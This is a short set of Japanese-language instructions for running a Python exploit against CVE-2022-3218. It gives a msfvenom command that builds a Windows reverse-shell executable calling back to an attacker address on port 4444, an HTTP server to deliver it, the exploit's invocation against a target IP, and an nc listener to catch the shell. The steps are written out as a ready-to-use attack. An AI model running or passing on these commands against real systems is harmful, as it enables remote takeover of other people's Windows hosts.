
CVE-2022-3218 向けの Python エクスプロイト。msfvenom を介してリバース TCP ペイロードを生成し、HTTP 経由でターゲットの Windows ホストに配信する。
ステップ 1 — 実際のペイロードを作成する (Windows)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.50 LPORT=4444 -f exe -o exploit.exe
ステップ 2 — HTTPでペイロードを提供する 同じディレクトリ内で: python3 -m http.server 80
ステップ 3 — エクスプロイトを調整する
次のように実行:
python3 CVE-2022-3218.py 172.20.7.185 10.8.5.50 exploit.exe
ステップ 4 — エクスプロイト前のリスナー nc -lvnp 4444